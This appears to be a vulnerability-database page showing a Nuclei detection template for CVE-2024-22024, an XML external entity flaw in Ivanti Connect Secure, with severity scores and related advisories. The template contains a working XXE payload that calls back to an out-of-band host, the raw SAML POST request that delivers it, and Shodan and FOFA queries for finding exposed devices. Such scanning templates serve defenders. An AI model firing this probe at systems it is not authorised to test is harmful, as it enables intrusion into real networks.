Lucene search
ProjectDiscoveryNUCLEI:CVE-2024-22024HistoryFeb 09, 2024 - 7:59 a.m.
Ivanti Connect Secure - XXE
2024-02-0907:59:13
ProjectDiscovery
github.com
78
ivanti
connect secure
xxe
xml external entity
unauthorized access
remote code execution
security patches
updates
watchtowr
cve-2024-22024
exploit
sensitive information
interactsh-url
samlrequest
dns interaction
http
post
saml
vendor
product
8.3 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
8.4 High
AI Score
Confidence
High
0.006 Low
EPSS
Percentile
78.4%
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
id: CVE-2024-22024
info:
name: Ivanti Connect Secure - XXE
author: watchTowr
severity: high
description: |
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
remediation: |
Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
reference:
- https://labs.watchtowr.com/are-we-now-part-of-ivanti/
- https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
metadata:
max-request: 1
vendor: ivanti
product: connect_secure
shodan-query:
- "html:\"welcome.cgi?p=logo\""
- http.title:"ivanti connect secure"
- http.html:"welcome.cgi?p=logo"
fofa-query:
- body="welcome.cgi?p=logo"
- title="ivanti connect secure"
google-query: intitle:"ivanti connect secure"
tags: cve,cve2024,xxe,ivanti
variables:
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
"http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'
http:
- raw:
- |
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
SAMLRequest={{base64(payload)}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 490a00463044022064dfea002db32f325d2a6eb8b2611463d76db7ac1f5dfd008ad98fc469f8af9102202351431f37385f4819eda1fc126a5f723e1c525b7a99a88c5628f5f0a53e45a9:922c64590222798bb761d5b6d8e72950Related
hivepro
hivepro
Ivanti Addresses Yet Another VPN Flaw Within a Month
2024-02-12 11:47:34
attackerkb
attackerkb
CVE-2024-22024
2024-02-13 00:00:00
prion
prion
Xxe
2024-02-13 04:15:00
akamaiblog
akamaiblog
Scanning Activity for CVE-2024-22024 (XXE) Vulnerability in Ivanti
2024-02-14 06:00:00
cvelist
cvelist
CVE-2024-22024
2024-02-13 04:07:04
githubexploit
githubexploit
cve
cve
CVE-2024-22024
2024-02-13 04:15:07
impervablog
impervablog
Imperva defends customers against CVE-2024-22024 in Ivanti products
2024-02-13 22:18:53
nvd
nvd
CVE-2024-22024
2024-02-13 04:15:07
thn
thn
malwarebytes
malwarebytes
Ivanti urges customers to patch yet another critical vulnerability
2024-02-09 18:13:42
nessus
nessus
Ivanti Policy Secure 9.x / 22.x Multiple Vulnerabilities
2024-02-09 00:00:00
Ivanti Connect Secure 9.x / 22.x Multiple Vulnerabilities
2024-01-10 00:00:00
ics
ics
8.3 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
8.4 High
AI Score
Confidence
High
0.006 Low
EPSS
Percentile
78.4%
Related for NUCLEI:CVE-2024-22024